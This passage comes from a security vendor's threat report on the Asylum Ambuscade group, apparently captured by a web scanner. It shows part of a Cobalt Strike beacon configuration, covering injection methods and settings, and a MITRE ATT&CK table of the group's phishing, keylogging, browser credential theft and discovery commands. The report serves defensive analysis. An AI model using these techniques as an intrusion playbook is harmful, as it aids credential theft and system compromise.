Proxy_Config - Not Found
Proxy_User - Not Found
Proxy_Password - Not Found
Proxy_Behavior - Use IE settings
Watermark - 206546002
bStageCleanup - True
bCFGCaution - False
KillDate - 0
bProcInject_StartRWX - False
bProcInject_UseRWX - False
bProcInject_MinAllocSize - 17500
ProcInject_PrependAppend_x86 - b'\x90\x90'
Empty
ProcInject_PrependAppend_x64 - b'\x90\x90'
Empty
ProcInject_Execute - ntdll:RtlUserThreadStart
CreateThread
NtQueueApcThread-s
CreateRemoteThread
RtlCreateUserThread
ProcInject_AllocationMethod - NtMapViewOfSection
bUsesCookies - True
HostHeader -
headersToRemove - Not Found
DNS_Beaconing - Not Found
DNS_get_TypeA - Not Found
DNS_get_TypeAAAA - Not Found
DNS_get_TypeTXT - Not Found
DNS_put_metadata - Not Found
DNS_put_output - Not Found
DNS_resolver - Not Found
DNS_strategy - round-robin
DNS_strategy_rotate_seconds - -1
DNS_strategy_fail_x - -1
DNS_strategy_fail_seconds - -1

MITRE ATT&CK TECHNIQUES

This table was built using version 13 of the MITRE ATT&CK framework.

TacticIDNameDescription Resource DevelopmentT1583.003Acquire Infrastructure:
Virtual Private ServerAsylum Ambuscade rented VPS servers. T1587.001Develop
Capabilities: MalwareAsylum Ambuscade develops custom implants in various
scripting languages. Initial AccessT1189Drive-by CompromiseTargets were
redirected via a TDS to a website delivering a malicious JavaScript file.
T1566.001Phishing: Spearphishing AttachmentTargets receive malicious Excel or
Word documents. ExecutionT1059.005Command and Scripting Interpreter: Visual
BasicAsylum Ambuscade has a downloader in VBS. T1059.006Command and Scripting
Interpreter: PythonAsylum Ambuscade has a screenshotter in Python.
T1059.007Command and Scripting Interpreter: JavaScriptAsylum Ambuscade has a
downloader in JavaScript (NODEBOT). T1059Command and Scripting InterpreterAsylum
Ambuscade has downloaders in other scripting languages such as Lua, AutoHotkey,
or Tcl. T1204.002User Execution: Malicious FileTargets needs to manually execute
the malicious document or JavaScript file. PersistenceT1547.001Boot or Logon
Autostart Execution: Registry Run Keys / Startup FolderSunSeed persists via a
LNK file in the startup folder. Defense EvasionT1027.010Obfuscated Files or
Information: Command ObfuscationDownloaded JavaScript files are obfuscated with
junk code. Credential AccessT1555.003Credentials from Password Stores:
Credentials from Web BrowsersAHKBOT passwords plugin can steal browser
credentials. DiscoveryT1087.002Account Discovery: Domain AccountAHKBOT domain
plugin gathers information about the domain using net group. T1010Application
Window DiscoveryAHKBOT wndlist plugin lists the active windows. T1482Domain
Trust DiscoveryAHKBOT domain plugin gathers information using nltest.
T1057Process DiscoveryAHKBOT tasklist plugin lists the active processes using
Select * from Win32_Process. T1518.001Software Discovery: Security Software
DiscoveryAHKBOT hardware plugin lists security software using Select * from
FirewallProduct, Select * from AntiSpywareProduct and Select * from
AntiVirusProduct. T1082System Information DiscoveryAHKBOT wndlist plugin gets
system information using systeminfo. T1016System Network Configuration
DiscoveryAHKBOT wndlist plugin gets network configuration information using
ipconfig /all. CollectionT1056.001Input Capture: KeyloggingAHKBOT keylogon
records keystrokes. T1115Clipboard DataAHKBOT keylogon monitors the clipboard.
T1113Screen CaptureAHKBOT deskscreen takes screenshot. Command and
ControlT1071.001Application Layer Protocol: Web ProtocolsAHKBOT (and all the
other downloaders) communicates with the C&C server via HTTP.
ExfiltrationT1041Exfiltration Over C2 ChannelData is exfiltrated via the C&C
channel.

Matthieu Faou
8 Jun 2023 - 11:30AM

SIGN UP TO RECEIVE AN EMAIL UPDATE WHENEVER A NEW ARTICLE IS PUBLISHED IN OUR
UKRAINE CRISIS – DIGITAL SECURITY RESOURCE CENTER

Submit

NEWSLETTER

Submit

www.welivesecurity.com Open in urlscan Pro 2a02:26f0:780::210:ca08 Public Scan

Form analysis 5 forms found in the DOM

GET https://www.welivesecurity.com/

GET https://www.welivesecurity.com/

GET https://www.welivesecurity.com/

POST https://enjoy.eset.com/pub/rf

POST https://enjoy.eset.com/pub/rf

Text Content

www.welivesecurity.com Open in urlscan Pro
2a02:26f0:780::210:ca08 Public Scan

Form analysis
5 forms found in the DOM